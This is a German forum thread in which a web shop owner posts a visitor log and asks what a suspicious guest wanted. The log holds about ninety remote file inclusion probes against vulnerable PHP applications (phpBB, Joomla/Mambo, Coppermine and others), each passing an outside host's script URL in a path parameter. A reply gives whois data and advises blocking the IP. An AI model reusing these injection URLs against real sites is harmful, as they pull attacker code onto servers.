Hacker online - Was geht da ab???

[zweistein]

Habe eben seltsamen Besuch in der "Wer ist online" Ansicht protokolliert:

00:04:33 0 Guest 83.15.231.245 16:19:00 16:19:00 /phplive/setup/header.php?css_path=http://www.ewert-clan.de/M.txt?&/

00:04:48 0 Guest 83.15.231.245 16:18:45 16:18:45 /modules/Forums/admin/index.php?phpbb_root_path=http://www.ewert-clan.de/M.txt?&/

00:04:50 0 Guest 83.15.231.245 16:18:43 16:18:43 /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.ewert-clan.de/M.txt?&/

00:04:52 0 Guest 83.15.231.245 16:18:41 16:18:41 /components/com_smf/smf.php?mosConfig_absolute_path=http://www.ewert-clan.de/M.txt?&/

00:04:59 0 Guest 83.15.231.245 16:18:34 16:18:34 /extensions/moblog/moblog_lib.php?basedir=http://www.ewert-clan.de/M.txt?&/

00:05:04 0 Guest 83.15.231.245 16:18:29 16:18:29 /photoalb/lib/static/header.php?set_menu=http://www.ewert-clan.de/M.txt?&/

00:05:06 0 Guest 83.15.231.245 16:18:27 16:18:27 /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.ewert-clan.de/M.txt?&/

00:05:10 0 Guest 83.15.231.245 16:18:23 16:18:23 /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ewert-clan.de/M.txt?&/

00:05:15 0 Guest 83.15.231.245 16:18:18 16:18:18 /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.ewert-clan.de/M.txt?&/

00:05:20 0 Guest 83.15.231.245 16:18:13 16:18:13 /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.jokel-net.de/M.txt?&/

00:05:23 0 Guest 83.15.231.245 16:18:10 16:18:10 /includes/search.php?GlobalSettings[templatesDirectory]=http://www.ewert-clan.de/M.txt?&/

00:05:25 0 Guest 83.15.231.245 16:18:08 16:18:08 /includes/functions.php?phpbb_root_path=http://www.ewert-clan.de/M.txt?&/

00:05:27 0 Guest 74.6.20.227 16:18:06 16:18:06 /index.php

00:05:28 0 Guest 83.15.231.245 16:18:05 16:18:05 /modules/vwar/admin/admin.php?vwar_root=http://www.ewert-clan.de/M.txt?&/

00:05:33 0 Guest 83.15.231.245 16:18:00 16:18:00 /bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=http://www.ewert-clan.de/M.txt?&/

00:05:38 0 Guest 83.15.231.245 16:17:55 16:17:55 /bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=http://www.ewert-clan.de/M.txt?&/

00:05:40 0 Guest 83.15.231.245 16:17:53 16:17:53 /bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=http://www.ewert-clan.de/M.txt?&/

00:05:42 0 Guest 83.15.231.245 16:17:51 16:17:51 /bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=http://www.ewert-clan.de/M.txt?&/

00:05:52 0 Guest 83.15.231.245 16:17:41 16:17:41 /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.ewert-clan.de/M.txt?&/

00:05:58 0 Guest 83.15.231.245 16:17:35 16:17:35 /admin/spaw/spaw_control.class.php?spaw_root=http://www.ewert-clan.de/M.txt?&/

00:06:00 0 Guest 74.6.31.118 16:17:33 16:17:33 /Kunstblumen/Seidenblumen/Rosen-grossbluetig-Seidenblumen-Kunstblumen::171.html

00:06:01 0 Guest 74.6.26.189 16:17:32 16:17:32 /Heim-Garten/Deko-Innen-/Korb-Hyazinthen-gross::266.html

00:06:30 0 Guest 83.15.231.245 16:17:03 16:17:03 /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ewert-clan.de/M.txt?&/

00:06:39 0 Guest 83.15.231.245 16:16:54 16:16:54 /?p=18/shop/index.php?action=http://www.ewert-clan.de/M.txt?&/

00:06:41 0 Guest 83.15.231.245 16:16:52 16:16:52 /?p=18/index.php?action=http://www.ewert-clan.de/M.txt?&/

00:06:46 0 Guest 83.15.231.245 16:16:47 16:16:47 /skin/board/default/doctype.php?dir=http://www.ewert-clan.de/M.txt?&/

00:06:51 0 Guest 83.15.231.245 16:16:42 16:16:42 /inc/irayofuncs.php?irayodirhack=http://www.ewert-clan.de/M.txt?&/

00:07:01 0 Guest 83.15.231.245 16:16:32 16:16:32 /index.php?pagina1=http://www.ewert-clan.de/M.txt?&/

00:07:09 0 Guest 83.15.231.245 16:16:24 16:16:24 /administrator/index3.php?mosConfig_absolute_path=http://www.ewert-clan.de/M.txt?&/

00:07:12 0 Guest 83.15.231.245 16:16:21 16:16:21 /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ewert-clan.de/M.txt?&/

00:07:24 0 Guest 83.15.231.245 16:16:09 16:16:09 /index.php?action=http://www.ewert-clan.de/M.txt?&/

00:07:27 0 Guest 83.15.231.245 16:16:06 16:16:06 /admin/business_inc/saveserver.php?thisdir=http://www.ewert-clan.de/M.txt?&/

00:07:29 0 Guest 83.15.231.245 16:16:04 16:16:04 /download/downloads.php?release_id=650&incdir=http://www.ewert-clan.de/M.txt?&/

00:07:37 0 Guest 83.15.231.245 16:15:56 16:15:56 /shop/index.php?action=http://www.ewert-clan.de/M.txt?&/

00:07:40 0 Guest 83.15.231.245 16:15:53 16:15:53 /shop.pl/page=http://www.ewert-clan.de/M.txt?&/

00:07:42 0 Guest 83.15.231.245 16:15:51 16:15:51 /classes/adodbt/sql.php?classes_dir=http://www.ewert-clan.de/M.txt?&/

00:07:50 0 Guest 80.142.165.215 16:15:43 16:15:46 /

00:08:01 0 Guest 83.15.231.245 16:15:32 16:15:32 /sources/functions.php?CONFIG[main_path]=http://www.ewert-clan.de/M.txt?&/

00:08:10 0 Guest 83.15.231.245 16:15:23 16:15:23 /includes/dbal.php?eqdkp_root_path=http://www.ewert-clan.de/M.txt?&/

00:08:13 0 Guest 83.15.231.245 16:15:20 16:15:20 /sources/template.php?CONFIG[main_path]=http://www.ewert-clan.de/M.txt?&/

00:08:16 0 Guest 83.15.231.245 16:15:17 16:15:17 /22_ultimate/search.php?what=&where=http://www.ewert-clan.de/M.txt?&/

00:08:18 0 Guest 83.15.231.245 16:15:15 16:15:15 /22_ultimate/templates/header.php?mainpath=http://www.ewert-clan.de/M.txt?&/

00:08:20 0 Guest 83.15.231.245 16:15:13 16:15:13 /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ewert-clan.de/M.txt?&/

00:08:26 0 Guest 83.15.231.245 16:15:07 16:15:07 /m2f/m2f_phpbb204.php?m2f_root_path=http://www.ewert-clan.de/M.txt?&/

00:08:28 0 Guest 83.15.231.245 16:15:05 16:15:05 /components/com_forum/download.php?phpbb_root_path=http://www.ewert-clan.de/M.txt?&/

00:08:33 0 Guest 83.15.231.245 16:15:00 16:15:00 /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ewert-clan.de/M.txt?&/

00:08:37 0 Guest 83.15.231.245 16:14:56 16:14:56 /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.ewert-clan.de/M.txt?&/

00:08:48 0 Guest 83.15.231.245 16:14:45 16:14:45 /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.ewert-clan.de/M.txt?&/

00:08:50 0 Guest 83.15.231.245 16:14:43 16:14:43 /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ewert-clan.de/M.txt?&/

00:08:53 0 Guest 83.15.231.245 16:14:40 16:14:40 /SQuery/lib/gore.php?libpath=http://www.ewert-clan.de/M.txt?&/

00:08:55 0 Guest 83.15.231.245 16:14:38 16:14:38 /modules/TotalCalendar/about.php?inc_dir=http://www.ewert-clan.de/M.txt?&/

00:08:58 0 Guest 83.15.231.245 16:14:35 16:14:35 /tools/send_reminders.php?includedir=http://www.ewert-clan.de/M.txt?&/

00:09:11 0 Guest 83.15.231.245 16:14:22 16:14:22 /surveys/survey.inc.php?path=http://www.ewert-clan.de/M.txt?&/

00:09:13 0 Guest 83.15.231.245 16:14:20 16:14:20 /components/com_simpleboard/image_upload.php?sbp=http://www.ewert-clan.de/M.txt?&/

00:09:16 0 Guest 83.15.231.245 16:14:17 16:14:17 /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=http://www.ewert-clan.de/M.txt?&/

00:09:19 0 Guest 83.15.231.245 16:14:14 16:14:14 /ppa/inc/functions.inc.php?config[ppa_root_path]=http://www.ewert-clan.de/M.txt?&/

00:09:21 0 Guest 83.15.231.245 16:14:12 16:14:12 /squito/photolist.inc.php?photoroot=http://www.ewert-clan.de/M.txt?&/

00:09:27 0 Guest 83.15.231.245 16:14:06 16:14:06 /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ewert-clan.de/M.txt?&/

00:09:40 0 Guest 83.15.231.245 16:13:53 16:13:53 /index.php?show=http://www.ewert-clan.de/M.txt?&/

00:09:43 0 Guest 83.15.231.245 16:13:50 16:13:50 /index.php?kobr=http://www.ewert-clan.de/M.txt?&/

00:09:45 0 Guest 83.15.231.245 16:13:48 16:13:48 /index.php?content=http://www.ewert-clan.de/M.txt?&/

00:09:50 0 Guest 83.15.231.245 16:13:43 16:13:43 /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ewert-clan.de/M.txt?&/

00:09:53 0 Guest 83.15.231.245 16:13:40 16:13:40 /modules/My_eGallery/index.php?basepath=http://www.ewert-clan.de/M.txt?&/

00:09:58 0 Guest 83.15.231.245 16:13:35 16:13:35 /index.php?url=http://www.ewert-clan.de/M.txt?&/

00:10:00 0 Guest 83.15.231.245 16:13:33 16:13:33 /index.php?c=http://www.ewert-clan.de/M.txt?&/

00:10:05 0 Guest 83.15.231.245 16:13:28 16:13:28 /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://www.ewert-clan.de/M.txt?&/

00:10:07 0 Guest 83.15.231.245 16:13:26 16:13:26 /index.php?id=http://www.ewert-clan.de/M.txt?&/

00:10:09 0 Guest 83.15.231.245 16:13:24 16:13:24 /index.php?site=http://www.ewert-clan.de/M.txt?&/

00:10:22 0 Guest 83.15.231.245 16:13:11 16:13:11 /index.php?site=http://www.ewert-clan.de/M.txt?&/

00:10:28 0 Guest 83.15.231.245 16:13:05 16:13:05 /index.php?go=http://www.ewert-clan.de/M.txt?&/

00:10:31 0 Guest 83.15.231.245 16:13:02 16:13:02 /index.php?pagina=http://www.ewert-clan.de/M.txt?&/

00:10:31 0 Guest 65.55.165.92 16:13:02 16:13:02 /index.php?

00:10:32 0 Guest 65.55.165.51 16:13:01 16:13:01 /index.php?

00:10:33 0 Guest 83.15.231.245 16:13:00 16:13:00 /index.php?var=http://www.ewert-clan.de/M.txt?&/

00:10:35 0 Guest 83.15.231.245 16:12:58 16:12:58 /index.php?body=http://www.ewert-clan.de/M.txt?&/

00:10:40 0 Guest 83.15.231.245 16:12:53 16:12:53 /index.php?option=com_custompages&cpage=http://www.ewert-clan.de/M.txt?&/

00:10:42 0 Guest 83.15.231.245 16:12:51 16:12:51 /includes/functions_weblog.php?=http://www.ewert-clan.de/M.txt?&/

00:10:44 0 Guest 83.15.231.245 16:12:49 16:12:49 /_blogadata/include/struct_main.php?incl_page=http://www.ewert-clan.de/M.txt?&/

00:10:47 0 Guest 83.15.231.245 16:12:46 16:12:46 /_blogadata/include/struct_admin_blog.php?incl_page=http://www.ewert-clan.de/M.txt?&/

00:10:52 0 Guest 83.15.231.245 16:12:41 16:12:41 /blog/_blogadata/include/struct_main.php?incl_page=http://www.ewert-clan.de/M.txt?&/

00:10:54 0 Guest 83.15.231.245 16:12:39 16:12:39 /blog/_blogadata/include/struct_admin_blog.php?incl_page=http://www.ewert-clan.de/M.txt?&/

00:10:59 0 Guest 83.15.231.245 16:12:34 16:12:34 /?_CONFIG[files][functions_page]=http://www.ewert-clan.de/M.txt?&/

00:11:04 0 Guest 83.15.231.245 16:12:29 16:12:29 /includes/functions_portal.php?phpbb_root_path=http://www.ewert-clan.de/M.txt?&/

00:11:06 0 Guest 83.15.231.245 16:12:27 16:12:27 /NewsOffice/news_show.php?newsoffice_directory=http://www.ewert-clan.de/M.txt?&/

00:11:10 0 Guest 83.15.231.245 16:12:23 16:12:23 /forums/123flashchat.php?e107path=http://www.ewert-clan.de/M.txt?&/

00:11:12 0 Guest 83.15.231.245 16:12:21 16:12:21 /forum/123flashchat.php?e107path=http://www.ewert-clan.de/M.txt?&/

00:11:18 0 Guest 83.15.231.245 16:12:15 16:12:15 /phpBB2/123flashchat.php?e107path=http://www.ewert-clan.de/M.txt?&/

00:11:26 0 Guest 83.15.231.245 16:12:07 16:12:07 /interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://www.ewert-clan.de/M.txt?&/

00:11:30 0 Guest 83.15.231.245 16:12:03 16:12:03 /news/example.php?site=http://www.ewert-clan.de/M.txt?&/

00:11:32 0 Guest 83.15.231.245 16:12:01 16:12:01 /kmitaadmin/kmitam/htmlcode.php?file=http://www.ewert-clan.de/M.txt?&/

00:11:34 0 Guest 83.15.231.245 16:11:59 16:11:59 /kmitam/htmlcode.php?file=http://www.ewert-clan.de/M.txt?&/

00:11:36 0 Guest 83.15.231.245 16:11:57 16:11:57 /SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=http://www.ewert-clan.de/M.txt?&/

00:11:38 0 Guest 83.15.231.245 16:11:55 16:11:55 /SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=http://www.ewert-clan.de/M.txt?&/

00:11:51 0 Guest 83.15.231.245 16:11:42 16:11:42 /Sources/Themes.php?settings[theme_dir]=http://www.ewert-clan.de/M.txt?&/

00:11:53 0 Guest 83.15.231.245 16:11:40 16:11:40 /Sources/Subs-Graphics.php?settings[default_theme_dir]=http://www.ewert-clan.de/M.txt?&/

00:11:57 0 Guest 83.15.231.245 16:11:36 16:11:36 /index.php?content=http://www.ewert-clan.de/M.txt?&/

Was will dieser Vogel und welchen Schaden hat er evtl angerichtet?

[Vio]

Dies ist der Vogel:

% This is the RIPE Whois query server #2.

% The objects are in RPSL format.

%

% Rights restricted by copyright.

% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.

% To receive output for a database update, use the "-B" flag

% Information related to '83.15.231.240 - 83.15.231.247'

inetnum: 83.15.231.240 - 83.15.231.247

netname: CUSTOMER-IDSL-066812

descr: static IP

descr: BRODNICA

descr: POLAND

country: PL

admin-c: TPHT

tech-c: TPHT

status: ASSIGNED PA

mnt-by: TPNET

source: RIPE # Filtered

role: TP S.A. Hostmaster

address: TP S.A.

address: ul. Nowogrodzka 47A

address: 00-695 Warszawa

address: Poland

phone: +48 22 6225182

fax-no: +48 22 6225182

remarks: Network problems -> [email protected]

remarks: Abuse and spam notification -> [email protected]

remarks: DNS problems -> [email protected]

remarks: Routing problems -> [email protected]

admin-c: TK569-RIPE

tech-c: TK569-RIPE

tech-c: JS1838-RIPE

nic-hdl: TPHT

remarks: ! - ! - ! - ! - ! - ! - ! - ! - ! - ! - !

remarks: Please send spam and abuse notification only

remarks: to [email protected]

remarks: phone: +48 22 8871788

remarks: ! - ! - ! - ! - ! - ! - ! - ! - ! - ! - !

mnt-by: TPNET

abuse-mailbox: [email protected]

source: RIPE # Filtered

% Information related to '83.0.0.0/11AS5617'

route: 83.0.0.0/11

descr: TPNET

descr: for abuse: [email protected]

origin: AS5617

mnt-by: AS5617-MNT

source: RIPE # Filtered

% Information related to '83.8.0.0/13AS5617'

route: 83.8.0.0/13

descr: TPNET

descr: for abuse: [email protected]

origin: AS5617

mnt-by: AS5617-MNT

source: RIPE # Filtered

Vermute mal, dass "Schwachstellen" im Shop ausgespäht werden sollen.

Entweder Du sperrst die IP mit einem Eintrag in der htaccess aus oder siehst Dir www.bot-trap.de mal an. Da habe ich die IP gemeldet und sie ist sofort gesperrt worden.

Grüße

Vio

[zweistein]

Wow! Danke für die Info, werde ich gleich machen...